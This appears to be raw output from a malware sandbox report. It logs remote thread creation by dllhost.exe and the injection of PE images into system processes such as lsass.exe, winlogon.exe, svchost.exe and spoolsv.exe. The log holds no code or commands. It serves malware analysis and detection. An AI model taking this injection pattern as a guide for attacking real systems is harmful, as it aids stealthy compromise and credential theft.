Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60312EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E2562EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4C592EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC7D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CCA02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 83F12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 83F42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27052EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31082EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 310B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: E5E22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4EE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC522EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC552EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 65092EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0522EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 15D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F2842EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: D6712EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 37402EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E3D52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FE072EBC

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
